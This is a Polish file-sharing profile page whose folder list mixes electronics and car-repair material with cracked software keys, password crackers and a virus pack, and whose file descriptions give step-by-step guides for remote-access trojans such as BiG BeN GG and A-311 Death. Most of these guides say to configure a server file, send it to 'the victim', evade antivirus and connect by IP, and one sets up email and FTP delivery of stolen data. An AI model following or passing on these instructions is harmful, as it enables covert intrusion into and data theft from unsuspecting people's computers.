Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto
waclaw.sz
  • Prezent Prezent
  • Ulubiony
    Ulubiony
  • Wiadomość Wiadomość

Mężczyzna wacek

widziany: 17.11.2025 20:45

  • pliki muzyczne
    88
  • pliki wideo
    531
  • obrazy
    6927
  • dokumenty
    16406

34963 plików
393,98 GB

Opis został ukryty. Pokaż opis
FolderyFoldery
waclaw.sz
AutoRadio pinout (kostki tylne opisy)
Biblioteka ogólnie-samochody
DLA SZUKAJĄCYCH PRACY
Eeprom programatory
elektronika auto
elektronika Hobby
Elektronika Inne
Elektronika na wesoło
Info Tech
Katalogi tranzystorów
Kody błędów pralek
Komputer Serwis
Komputerowy słownik elektroniki
Kuchenki mikrofalowe schematy instrukcje
LAPTOPY - Repair Ultimate Video Collection
Magnetowidy schematy
Maszyny
Mikrokontrolery
Modyfikacja mikrofonu CB
Monitory LCD schematy
Piloty, instrukcje i schematy
Programy do kalibracji ekranu
Schematy pilotów i instrukcje programowania
Schematy popularnych pralek
Schematy TV lampowych
Schematy TV LCD i plasma
Technika SMD - różne pliki
Telefony stacjonarne - schematy
TV CRT schematy
TV lampowe schematy
TV LCD i plasma schematy
Wielka baza układów scalonych
Wsady pamięci (dump memory)
Wzmacniacze audio
Wzmacniacze audio - schematy
Wzmacniacze mocy audio
Wzmacniacze sam - schematy instrukcje
Zasilacze i prostowniki
Zasilacze komputerowe
Wtyczki, gniazda(1)
!!!! WINDOWS 8 (x32) BETA
!Naprawa OPLA- progr.SERWISOWY !
!Naprawa OPLA- progr.SERWISOWY !(1)
!Naprawa OPLA- progr.SERWISOWY !(2)
!OPEL - Katalog części program PROFESJON
# - klucze do wszelakich programów
#Był sobie człowiek
• AllData DVD-EMI2002
• AllData Repair 10.40 (2011.01) - dziala
• Asystent elektronika
• AutoTRAX 9.7
• Autotrax Design Express 2
• Eagle 5.6 Full + podręcznik PL
• Katalogi tranzystorów
• Katalogi tranzystorów(1)
• Komputerowy słownik elektroniki
• Mikrokontrolery(1 )
• Monitory LCD
• Schematy monitorów LCD
• Układy scalone
• Wielka baza układów scalonych
• Wielka baza układów scalonych(1)
(4) Elektronika(1)
; ATLAS UZWOJEŃ silników indukcyjnych
; Laptop Repair Ultimate Video Collection
; Poznajemy przyrządy pomiarowe
; Programowanie pilotów
; Schematy spawarek
; Spawarki - schematy itp
; Wzmacniacze samochodowe - schematy
_Katalogi
_Różne komputery
_Zasilacze PC el
€ KATALOGI ®
► Do wykorzystania
► Największy zbiór książek INFORMATYKA
►❏ IKONY 3D HD win7
►❏ TAPETY HD win7
►❏ TEMATY WIN 7
►❏ WIN 7 NAPRAWA
►AutoMapa
►Garmin - MAPY
►INSTALACJE ELEKTRYCZNE
►Mapy Q1.2011 (luty)
►Mapy TOMTOM
►OTWIERANIE ZAMKÓW _________________ ____
►PROGRAMY na telefon
►Ukryta kamera
►Wędkarstwo
◆Komputer
● Mega Paczka Najlepszych Programów 2011
● Programy do odzyskiwania danych
●●●●ODBLOKUJ NAWIGACJE
●TEMATY WIN 7
█▬█ █ ▀█▀ NOWOŚCI Instrukcje obsługi aparaty fotograficzne(1)
█▬█ █ ▀█▀ NOWOŚCI Instrukcje obsługi CB,KF,UKF(1)
█▬█ █ ▀█▀ NOWOŚCI Instrukcje obsługi laptopy noteboki(1)
█▬█ █ ▀█▀ NOWOŚCI Instrukcje obsługi samochodów
█▬█ █ ▀█▀ NOWOŚCI Instrukcje obsługi samochodów(1)
█▬█ █ ▀█▀ NOWOŚCI Instrukcje obsługi samochodów(2)
█▬█ █ ▀█▀ NOWOŚCI Instrukcje obsługi samochodów(3)
█▬█ █ ▀█▀ NOWOŚCI Instrukcje obsługi samochodów(4)
♥ Nawigacja
♦ PROGRAMY do pc
0.DriverPacks !!!
1 Układy Scalone
1...9 scalone
1.4 eTech WorkShop Data
1000-watt-bjt-amp lifikator-surucu- modulu
2 N
2SA tranzystory
2SB trNZYSTORY
2SC trannzystory
2SK tranzystory
3500 SERIALS OF MICROSOFT PRODUCT
400,000 tys .Sterowników.PC+L aptop 2010.rok
500w_anfi_MJ15003
800+ Laptop Notebook repair manual Service guide DVD
A ukł scsalone
ABC Dziecko
ABC komputera
Acer Aspire 7730
acer serwisowe
ACRONIS OLD PACK [PL][FULL]+[DODAT KI+SERIAL]
Adobe Dreamweaver CS5 v11 Eastern Edition PL
Akceleratory pobierania plików
AKORDEONOWE
Akumulator
Alarmy
Alarmy-Schematy i Instrukcje
Ale programy
Alternatory wyprowadzenia
Antena Wi-Fi 2,4Ghz
Anteny wi.fi
Aplikacje wzmacniaczy operacyjnych
Asus f5n komplet sterownikow wszystkie systemy plus karta graficzna Go 6100 pod win7
Asus F5N sterowniki
atapety Windows 7
ATI XP 32-bit
ATLAS UZWOJEŃ silników indukcyjnych
ATMEGA16 elektronika
ATMEGA16 elektronika(1)
AUDI
Audi 80
AUDI 80 B4
Audi 80(1)
Audi 80(2)
Audi schemat elek
AUDI VW SKODA SEAT NAVI PL Menu
Audi(1)
Audio
Audioelektronika
AUTA SOFT
Auto poradniki
Automatyka
Automatyka(1)
Automatyka======= ===
AVR
AVT
Bascom
BAZA__DANYCH chasis tv
BB5 serwisówki
Bezpieczeństwo komputerowe
BIBLIOTEKI NET FRAMEWORK 1.1 - 2 - 3 - 3.5 - 4
BIOS
Bios(1)
BIOS(2)
Bonsai
box suport
 
BU tranzystory
Budowa i naprawa komputera
C
CB RADIO
 
CEMI
CEMI(1)
Ciągniki - instrukcje naprawy i obsługi
ciasta
Ciekawostki
Cityscapes [Full HD]
CMOS4000
CNC
CNC(1)
Commodore C64 emulatory gry
convertery(1)
Counter Strike 1.6 v23
Czujniki w pojazdach samochodowych
D H T
D900
Dekoder Elektryka
Dekoder Rezystorów
Diagnostyka
Diagnostyka BMW
Diagnostyka Daewoo
Diagnostyka Ford
diagnostyka HDD
Diagnostyka Mercedes
Diagnostyka Opel
Diagnostyka pojazdów
diagnostyka pojazdów ! ● DIAGNOSTYKA POJAZDÓW!!!MEGA PAKA ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀
Diagnostyka samochodowa
Diagnostyka samochodowa(1)
Diagnostyka samochodowa(2)
Diagnostyka VAG
Diagnostyka Volvo
Diagnostyka VW
Diody
Diody - aplikacje
Diody laserowe
Diody(1)
Diody(2)
DIODY-TYRYSTORY
DipTrace Free 1.40
DirectX
DirectX 9,10,11
DirectX(1)
DjVu - przeglądarka i wtyczka PL
djvu reader
dla elektryków samochodowych
Do filmów X-vid Div-X
do samodzielnego ksztalcenia się
Dokumenty
 
Odzyskiwanie danych
dokumenty urzedowe
Dokumenty wzory pism
Dokumenty(1)
Dom elekryka elektronika
drukarki
Drukarz
dyplomy
dyplomy (certyfikaty)
Dyplomy itp na wesoło
Dyplomy szkolne ★
DYSKI TWARDE
Dyskietki startowe
Dzielnik napięć
Dziury na ziemi
Dziwy na niebie
Edytory schematów i PCB
ELEKTRONIKA
Elektronika - program edukacyjny
Elektronika - programy
Elektronika analogowa
Elektronika Audio
Elektronika C 01 2009 DVD
Elektronika C 04 2009 DVD
Elektronika dla Nieelektroników
Elektronika dla wszystkich 2010
ELEKTRONIKA FULL
Elektronika Kalkulator
Elektronika praktyczna
Elektronika Praktyczna 2010
Elektronika Praktyczna 2011
Elektronika praktyczna płyta CD 2008
Elektronika Praktyczna(1)
Elektronika rtv itp
Elektronika(1)
Elektronika(1)(1)
Elektronika(10)
Elektronika(11)
Elektronika(12)
Elektronika(2)
Elektronika(3)
Elektronika(4)
elektronika(5)
Elektronika(6)
ELEKTRONIKA(7)
elektronika(8)
elektronika(9)
Elektronika,Elekt ryka, Diagnostyka Pojazdów
Elektrotechnika i mechanika samochodowa
Elektrotechnika(1 )
Elektrotechnika(2 )
Elektrownie cieplne
Elektrownie parowe
elektryka
Elektryka samchodowa
Elementy indukcyjne
elementy smd
Elementy SMD(1)
Energetyka
Ethernet RJ45B
ETKA 7.0 PL
EUROPA.nfs Q2.2014
EVEREST Ultimate Edition 5.00.1650 PL
exFAT dla WinXP SP2 i 3
Falowniki
falowniki-instruk cje
FiatEcuScan 3.5 - PL PEŁNA WERSJA !!
Filmy instruktażowe
Filmy jak złamać WEP
Fizyka ciała stałego
Fizyka i Fizyka chemiczna
FLAGI ŚWIATA ( gif )
FLAGI CAŁEGO ŚWIATA ( gif )
flagi EUROPA
FLAGI WEWNĘTRZNE USA (stany)
formatowanieHDD
fotoelektronika Pozostałe
Full_Video_Conver ter
Gadzety różne
Gadżety Windows 7
Galeria
 
Gaz w autach
Generator
Generatory.Mierni ki
Generatory.Mierni ki(1)
GPS
GPS(1)
Grafika
GSM zasilacze
Hacker
hasła
hasła licencje
Hydraulika i pneumatyka
iGO8 mapa 2013Q4 EU
Ikony dla Windows 7
INFORMATYKA(1)
Info-tech
Inne ciekawe bajery elektroniczne
Inne elektronika
INNE tranzystory
inrtrukcje obsługi telefonów kom
Instalacje energoelektryczne
instalki
instrukcje car audio Od A do C
instrukcje caraudio Od D do J
instrukcje caraudio Od P do R
instrukcje caraudio Od S do Z
instrukcje caraudiu Od K do O
Instrukcje obsługi aparaty fotograficzne
Instrukcje obsługi CarAudio
Instrukcje obsługi CB,KF,UKF
Instrukcje obsługi ciągników i maszyn rolniczych
Instrukcje obsługi laptopy noteboki
Instrukcje obsługi motocykle
Instrukcje obsługi odbiorniki satelitarne
Instrukcje obsługi pojazdów
Instrukcje obsługi samochodów
Instrukcje obsługi sprzęt audio-video
Instrukcje obsługi telefonów
Instrukcje pilotów uniwersalnych
Instrukcje serwisowe laptopów
Instrukcje telefony
Instrukcje, Poradniki
Interfejsy PC-schematy
IRDA DO PC
ISO Elektronika Praktyczna
istrukcje obsługi
JAK ROZKRECIĆ TELEFON
Jak to jest zrobione
Jak to jest zrobione(1)
Jak to jest zrobione(2)
Jak zmontowac komputer PC
Jtag
Kaban
kalkulatory do radii samochodowych
Karty dźwiękowe
Karty katalogowe
Katalog czesci
Katalog TTL CMOS
Katalogi - Układy scalone
Katalogi - Wielka baza układów scalonych
Katalogi CEMI i Unitra
KATALOGI CZĘŚCI RTV
Katalogi tranzystorów
Katalogi, Elementy
KEE
Klucze do programów
kodeki
KODEKI(1)
kodeksy
Kody błędów (usterek) ODB
Kody pilotów uniwersalnych
Kody telefonów
Komórka - telefon
komputer
Komputer - naprawa
KOMPUTER ABC
KOMPUTER ABC(1)
Komputer porady
KOMPUTER(1)
Komputery
Komputery laptopy
końcówki mocy schematy
Kondensatory
konsola odzyskiwania XP
Konstrukcje drewniane
Konwerter kodu paskowego
Książki elektronika
Książki elektronika(1)
Ksiązki elektryka elektronika hasło 123
KTB baza danych
L3L4 komurki
LA
LABSOFT
Łamacze haseł
LAN
Laptop Manual Repair Serwice
Laptop Repair Ultimate Video Collection
Laptop Service Manuals Collection
Laptop-Notebok-Ma nual Serwice
LAPTOPY - Instrukcje serwisowe
LAPTOPY - zrób to sam
Laptopy, Notebooki
Laptopy, Notebooki(1)
LCD -Plazma
Ledy wyswietlacze
Lekarz Domowy PL
Literatura diagnostyczna
LM
LPG Servis
LUTOWANIE Filmy instruktażowe
Lutowanie SMD
MADE IN HINA itp
Majsterkowanie
MAPY
mapy europy q3 dla android
Matematyka
Matlab - obliczenia(rozwią zywanie zadań)
Matryce LCD
Mazda(1)
mech precyzyjna
mechatronika
Mediator14
Microsoft .Net Framework 3.5 SP1 [Offline Version]
MICROSOFT AUTOROUTE 2011
mikroprocesory programatory
Mikroprocesory itp
Mikroprocesory, Mikrokontrolery
MioMap 2008. europe_ full_ 200801
MIRENIKI GENERATORY ITP
Modyfikacje Windows 7
moja wrzuta z dysku
Mojosoft BusinessCards MX 4.3 [PL] [Serial]
Monitory
Monitory LCD schematy
Monitory(1)
Monster Mega Sound Pack
MOSTKI PROSTOWNICZE
Motorowery schematy
Motoryzacja
Motoryzacja(1)
mp3 cyganie
naprawa dysku Fujitsu
naprawa dysku IBM_Hitachi
naprawa dysku Maxtor
naprawa dysku Samsung
naprawa dysku Seagate
naprawa dysku WesternDigital
Naprawa komputera
NaprawA-KoMpa
Narzędzia dla elektroników
Nawigacja GPS
Nemesis Service Suite (NSS) 1.0.38.15
Nero 11 Platinum
Nero wersje różne
Net Framework
Net Framework 4 Full
Net framework 2,3,3.5
N-MOS
Nokia
Nokia GSM Service Manual Collection
Nokia instrukcje
nokia navifirm
nokia programy
nowe przepisy i wiele więcej
Numizmatyka, banknoty
nVidia XP 32-bit
Obrazy płyt
Obróbka zdjęć porady
ochrona przepięciowa
Odtwarzacze CD audio
Odzyskiwanie danych
ODZYSKIWANIE DANYCH (ELKA1806)
olkkka
Opony, Felgi, Hamulce
Optoelektronika
OPTOELEMENTY
Oryginalne pliki WXP
OSCYLOSKOPY
Ośla I
Ośla II
Otwieranie drzwi kluczyki
OZNACZENIA
OZNACZENIA SMD
P H O E N I X (najnowszy)
PACZKA OKOŁO 3700 WIRUSÓW DO TESTU ANTYWIRUSA
pamiątki PRL-lu
partycjonowanieHD D
PCMSCAN v2.4.9. PL
Picasa 3.1
pierwsze kroczki w cyfruwce
Pilot uniwersalny - instrukcje obsługi i tabele kodów
Piloty, instrukcje i schematy
Pinnacle Studio HD Ultimate 15 full
PIROTECHNIKA
Playlisty
 
♠ Filmiki
pliki dll
Płytki PCB w domu
Płyty główne
Płyty główne(1)
PM-y BB5 nokia
Pocket PC Aplikacje, spolszczenia, dodatki
Pocket PC System
PODSTAWY ELEKTRONIKI
Podstawy Elektroniki Tom I
Podstawy Elektroniki Tom I(1)
Podstawy komputera i biosu
Podstawy konstrukcji maszyn
Podstawy-warto wiedzieć
POI IGO PRIMO
Pomoce dla dzieci
PORADNIKI BONSAI
Poradniki elektronika
Poradniki samochodowe
PORADNIKI wzory umów
Porady elktryka
Porady Różne
porty, IP
Poznajemy przyrządy pomiarowe
Pozostałe elektronika
Pozwy procesowe
PRAWO JAZDY 2010
PRL- różności
PROFESJONALNY VIDEO KURS NAPRAWY LAPTOPÓW POLECAM!!!!
Program wyświetla nam kod pin
PROGRAMATOR EEPROM
Programatory
Programatory - Aplikacje
Programowanie
Programowanie informatyka
Programowanie pilotów
Programy
Programy budowlane inżynierskie
Programy Diagnostyczne
Programy dla wędkarzy
Programy dla wędkarzy(1)
Programy do kalibracji ekranu
Programy do otwierania plików
Programy do ściągania plików
Programy elektronika
Programy elektronika (1)
Programy Elektronika(1)
Programy elektryka
programy komurki
PROGRAMY RÓŻNE
programy serwisowe Nokia & Symbian
Programy Serwisowe samochody
Programy sony ericson
Programy win 7 legalizatory itp
Programy(2)
programy(3)
Programy(4)
PROGRAMY,GRY NA PC VISTA
PROGRAMY3
---PROGRAMY---kom órki
programy-zabawki
Proste i użyteczne
Proste Schematy
Proste Schematy PC
Prostowniki
Prostowniki do ładowania akumulatorów
Prostowniki i zasilacze
Przeglądarka DJVU PL
Przekaźniki opto
Przestrajanie
Przetwornice
Przetwornice impulsowe
Przyciski u radia
przyrzady naPC
Radia samochodowe schematy
Radio i telewizja
Rayman 2 Wielka Ucieczka (The Great Escape) PL - Polska Wersja ! obraz płyty img pełna polska wersja
Rayman 3 Hoodlum Havoc PL Rayman 3 PL !! Polska wersja językowa - jeden plik ! Pełna polska wersja językowa gry
Realtek HD Audio
Regulatory
remonty instalacje
Renault
REPAIR BB5
Rezystory
Różne
Różne [Full HD]
Różne samochodowe
Rózne system
różne(1)
róznosci z elektroniki
Rozrywka elektronika
Rysunek techniczny======
S(1)
SAM NAPRAW - programy diagnostyczne i nie tylko samochody radia samochodowe
SAM NAPRAWIAM - KSIĄŻKI DO SAMOCHODÓW
Sam Naprawiam - Zestaw Ebook'ów (samochody - lista w środku) ═══════════════
Sam naprawiam ,Instrukcje obsługi samochodów
Sam naprawiam AUTO - PDF
samochód
Samochód tester sond lambda
Samochody - Chip-owanie
Samochody osobowe - Opisy Techniczne i regulacyjne [.iso]
SAMOCHODY SERVICE @ MANUAL
Scheamty Motocyki (mati11276) (mati11276)
schemat Irda
schemat Konwerter VGA-TV
schematy
Schematy - GSM
Schematy - Laptopów, Mainboard
Schematy - Laptopów, Mainboard(1)
schematy 1
schematy audio
Schematy CB Radio
schematy Domofon-intercom
Schematy DVD
Schematy elekronika
Schematy elektroniczne
schematy elektryczne Audi
schematy elektryczne BMW
schematy elektryczne Chrysler
schematy elektryczne Daewoo
schematy elektryczne Fiat
schematy elektryczne Ford
schematy elektryczne Hyundai
schematy elektryczne Mazda
schematy elektryczne Mercedes
schematy elektryczne Mitsubishi
schematy elektryczne Toyota
schematy elektryczne Volvo
schematy elektryczne VW
schematy html
Schematy ideowe w PDF
Schematy interfejsów do aut
schematy jpg
schematy Komputer
schematy laptopów
schematy Miernikow
Schematy mierników
Schematy monitorów LCD
schematy najbardziej znanych laptopów swiata, programy do diagnostyki, pixeltest, keytesting,
Schematy OR
Schematy OTV
Schematy podłączeń alarmów w samochodach
Schematy pralek instrukcje
schematy Regulatory
schematy różne(1)
schematy serwisowe
Schematy serwisowe(1)
Schematy serwisowe(2)
Schematy serwisowe(3)
Schematy serwisowe(4)
Schematy smps+wzmacniacze
schematy stare
schematy S-VHS
Schematy telefonów
Schematy telewizorów
schematy TV
Schematy(1)
Schematy(1)(1)
schematy(2)
Schematy(3)
schematy(4)
schematy(5)
Schematy(6)
Schematy(7)
---SCHEMATY---GSM
serial key
SERVICE MODE
Serwisówki
SERWISÓWKI ! Laptopów i Notebook-ów
Serwisówki laptopów,notebokó w
Sieci komputerowe porady
Silnik , układy
Silniki
Silniki elektryczne w praktyce elektronika
Silniki i falowniki
Simson
Slniki Krokowe EdW
Slniki Krokowe EdW(1)
Slniki Krokowe EdW(2)
SMOKIE
Software elektronika
SolidWorks 2011
SonyEricsson
Spawalnictwo
Spawarki
Spis Elementów el
Spryciarze
spryciarze(1)
SPRYCIARZE(2)
SPRYCIARZE.PL
Stabilisatory
Stabilizatory
Stare Mapy
Sterowanie przez LPT
Sterowniki
Sterowniki do drukarek skanerów, laptopów
Sterowniki do Laptopa ASUS
sterowniki PC
Sterowniki(1)
sterowniki+opis
Sterownikixp
STK(1)
STO LAT
strumienie NTFS
SUPER!- Spryciarze- POLECAM-۾۝ۣۜۖ۾ەۣۖ ۣۖ
S-VHS schemat
System Windows poraddy
system-repair
Szablony przenikania 2 rur pod dowolnym kątem
TA
Tajemnica Układu Warszawskiego
tapety
TBA
TDA
TEA
technika grzewcza
Technika SMD
Technika SMD - różne
Telefon
TELEFON (Katalog_Telefonó w i Palmtopów-Szegóło wy opis )
Telefony
Telefony komórkowe instrukcje
Telefony Nokia Schematy serwisowe SERVICE MANUALS
Telefony stacjonarn pierwsze modele - schematy
Tematy Windows 7,
Termometry
Tester Portów COM
Textury minecraft
TINA 7.0
TIP
tolerance data 2008 PL
Tolerance Data 2008 PL(1)
Tolerance Data 2008.3 PL
Traktory
Transformatory
Transformatory i cewki
Transformatory(1)
Transformatory(2)
Transformatory(3)
Transformatory(4)
TRANSLATOR ANGIELSKI
TRANSLATOR NIEMIECKI
Tranzystory
Tranzystory(1)
Tranzystory(2)
Tranzystory(3)
TRANZYSTORY(4)
Tranzystory(5)
Tranzystory(6)
Tranzystory(7)
Triaki
Triaki i diaki
Triaki tyrystory
Tryby Serwisowe
Tryby serwisowe RTV
Tryby serwisowe TV - instrukcje
TV
TV CRT
TV CRT schematy serwisowe
TV lamp schematy serwisowe
Tyrystory i triaki
ukł scalone B
ukł scalone C
ukł scalone D
ukł scalone G
ukł scalone H
ukł scalone I
ukł scalone J
ukł scalone K
ukł scalone L
ukł scalone N
ukł scalone R
ukł scalone S
ukł scalone T
ukł scalone U
ukł scalone V
ukł scalone W
ukł scalone X
Układy i układziki do łatwego montażu
Uklady scalone
Układy scalone
Układy scalone 1
układy scalone jpg
układy scalone M
układy scalone O
układy scalone P
Układy scalone(1)
Układy scalone(2)
Układy Scalone(3)
Ultimate Boot CD
Ultimate Boot CD (UBCD)
Umowy
UNetbootin - Universal Netboot Installer
uninstallery
USB_drivers
UZYTKI
vagtachoUSB1.5
vagtachoUSB17
VCR schematy serwisowe
VGA to TV converter
VIA
Video
VIDEODOMOFON
Visual C# 2005 krok po kroku_źródła
Vivid WorkShop Data ATI 10.2 PL - sprawdzona instalacja
Vivid WorkshopData 2009 PL Final
Vivid WorkshopData 2010
Vivid WorkshopData ATI v10.2 Q2 2010 PL
Volo View przeglądarka aCAD
Warsztat
warsztat(1)
Warystory
Wedkarstwo,poradn iki,atlasy
WESELE MARZEŃ - hasło 123
weselne
węzły ,zestawy
Wgrywanie ROM Samsung
Wielka Paczka Sterowników dla Windows 2000-XP-2003-Vist a-7
WIELKI ATLAS PTAKÓW- wszystki gatunki
Wielki Poradnik Instalatora Autoalarmów
wielkie napady PRL -u
WiFi
WIN 7 Wskazówki dla zaawansowanych
Windows 2000
Windows 7 Ultimate
Windows 95
Windows Kodeki
Windows Mobile
Windows Recovery Environment
Windows triki, budowa i naprawa pc
Winprom
WINSCOPE el
WinXP dla expertów
Wojskowa mapa Polski
Wsady pamięci (dump memory) różne
Wszystkie najlepsze i potrzebne programy do kompa
WSZYSTKO O KOMPUTERACH
Wtyczki, gniazda
Wtyczki, gniazda(1)
Wykonanie płytek PCB w domu
Wyświetlacze Alfanumeryczne
Wzmacniacze
Wzmacniacze samochodowe - schematy
Wzory pism procesowych
Wzory umów
zabawne dyplomy
zachomikowane
Zasilacz na LM-317
Zasilacze
Zasilacze i ładowarki
Zasilacze i prostowniki - schematy i opisy
Zasilacze Komputerowe
Zasilacze(1)
Zasilacze(2)
ZAWAŁ koniecznie zobacz
Zdięcia dające do myślenia!!!!!
Zegary
zeszyty serwisowe VW PL
znaki drogowe
Zrób To Sam
Zrób to sam vol.2
Pokazuj foldery i treści
  • 2,2 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Ccobra 1.1"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy foldery:
klint, serwer.
3. Wchodzimy do folderu serwer i widzimy plik o nazwie: gg6.1.exe
Ten plik wysyłamy do naszej ofiary.
4. My zaś wchodzimy do folderu klient i odpalamy plik o nazwie Ccobra1.1.exe. Uruchamia się program widziany na screenie, w którym podajemy adres IP ofiary i klikamy na "Połącz"

zachomikowany

  • 1,6 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "CAFEiNi 1.1.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
CaFEiNclient.exe, CaFEiNconfig.exe, CaFEiNserver.exe
3. Najpierw odpalamy u siebie plik o nazwie CaFEiNconfig.exe za pomocą którego skonfigurujemy odpowiednio nasz plik server. Uruchomi się program widziany na screenie:

Kiedy już wszystko ustawimy i uzupełnimy ramki klikamy na opcję: "Zapisz ustawienia do servera". Gotowe :)
4. Teraz plik CaFEiNserver.exe (czyli serwer) wysyłamy do naszej ofiary.
5. My zaś otwieramy plik CaFEiNclient.exe (czyli client). Uruchomi się program widziany na screenie, w którym podajemy adres IP lub HOST naszej ofiary i klikamy na "Połącz"

zachomikowany

  • 2,2 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "BiG BeN GG 2.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
BiG Ben GG Server 2.0.exe, BiG Ben GG v2.0 KillServer.exe, GGPassCrack.exe,
Konfigurator BiG Ben GG v2.0.exe, Opis+komendy.txt
3. Otwieramy u siebie plik o nazwie Konfigurator BiG Ben GG v2.0.exe
Program ten służy do odpowiedniego skonfigurowania trojana. Uruchamia się program widziany na screenie:


Uzupełniamy wszystkie ramki:

Edycja serwera:
Numer GG servera - tworzymy nowy numer GG i podajemy ten numer.
Ponadto zapisujemy go u siebie na liście kontaktów, bo będzie potrzebny ;]
Hasło GG servera - wpisujemy hasło do nowo założonego numeru
Numer GG klienta - tu wpisujemy własny numer GG to na niego będziemy dostawać info z servera

E-mail:
Wyślij na e-mail - tu wpisujemy na jaki mail mamy dostawać plik "config.dat"
Wyślij z e-mail - w to pole wpisujemy pelny mail z jakiego będziemy wysyłać plik "config.dat
Host E-mail - w to pole wpisujemy host poczty np: poczta.interia.pl
Login - w to pole wpisujemy login jaki używamy do zalogowania na e-mail
Hasło E-mail - hasło jakiego używamy do logowania na e-mail

FTP:
Host FTP - w to pole wpisujemy host do ftp
Port FTP - określamy port na jakim działa ftp
Login - podajemy login do naszego ftp
Hasło FTP - hasło dostępowe do servera ftp

Jak już wszystko ładnie uzupełnimy to klikamy na opcję "Zapisz" Gotowe. nasz plik serwer (czyli plik BiG Ben GG Server 2.0.exe) został skonfigurowany :)

4. Teraz wysyłamy plik BiG Ben GG Server 2.0.exe do naszej ofiary.
Oczywiste jest że ofiara musi go otworzyć, a antywirus nie zabić.....
5. Następnie otwieramy program Gadu-Gadu i wysyłamy odpowiednią komendę na numer serwera. Spis komend znajdziesz w paczce w pliku
"Opis + komendy.txt"

zachomikowany

  • 2,0 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Big Ben 3.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
Big Ben v.3.0 Klient.exe, Big Ben v.3.0 Server.exe, Big Ben v.3.0 Kill Server.exe
3. Plik o nazwie Big Ben v.3.0 Server.exe podrzucamy naszej ofiarze.
4. My zaś otwieramy plik Big Ben v.3.0 Klient.exe. Uruchomi się program widziany na screenie, w którym klikamy na zakładkę "Połączenie" i podajemy adres IP naszej ofiary i klikamy na "Połącz"

------------------------------------------------------------------------------------------------------------

zachomikowany

  • 2,0 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Big Ben 2.5.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
Big Ben v.2.5 Klient.exe, Big Ben v.2.5 Server.exe
3. Plik o nazwie Big Ben v.2.5 Server.exe podrzucamy naszej ofiarze.
4. My zaś otwieramy plik Big Ben v.2.5 Klient.exe. Uruchomi się program widziany na screenie, w którym podajemy adres IP ofiary i klikamy na "Połącz"

zachomikowany

  • 1,3 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Aresinvader.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu.
3. Następnie otwieramy folder "serwery" i widzimy tam dwa pliki:
"server na 95,98.exe", "server na wszystkie wersje"
Któryś z tych dwóch plików musisz podesłać swojej ofiarze.
4. Ty zaś odpalasz us siebie plik o nazwie "Aresinvader" (czyli plik client).
Uruchamia się program widziany na screenie, w którym musisz kliknąć na opcję "Target" i podać adres IP lub HOST ofiary.

zachomikowany

  • 1,9 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Antylamus 0.2.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
Project1.exe, server.exe
3. Plik serwer podrzucamy naszej ofiarze.
4. My zaś otwieramy plik Project1.exe (czyli client). Uruchomi się program widziany na screenie, w którym podajemy adres IP naszej ofiary i klikamy na "connect"
<a>

zachomikowany

  • 1,6 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "AntiMks 0.1 beta.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
AntiMks.exe, Setup.exe
2. Plik Setup.exe (czyli server) podrzucamy naszej ofiarze.
3. My zaś otwieramy plik AntiMks.exe za pomocą którego połączymy się z zainfekowanym komputerem (zakładka "Połącznie"). Uruchamia się program widziany na screenie:
<a><a><a>

zachomikowany

  • 1,3 MB
  • 15 lis 11 18:27
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie A-311 Death v.1.02.zip
2. Dekompresujemy ten plik i wchodzimy do folderu i odpalamy plik o nazwie pconfig.exe Uruchamia się program widziany na screenshocie:

Właśnie za jego pomocą stworzymy plik serwer, który potem podeślemy naszej ofiarze.
Zaznaczamy i uzupełniamy odpowiednie ramki, czyli jednym słowem mówiąc po prostu odpowiednio konfigurujemy plik serwer :) Kiedy już to zrobimy klikamy na
opcję "save as". Zostanie stworzony plik serwer, który wysyłamy do naszej ofiary.
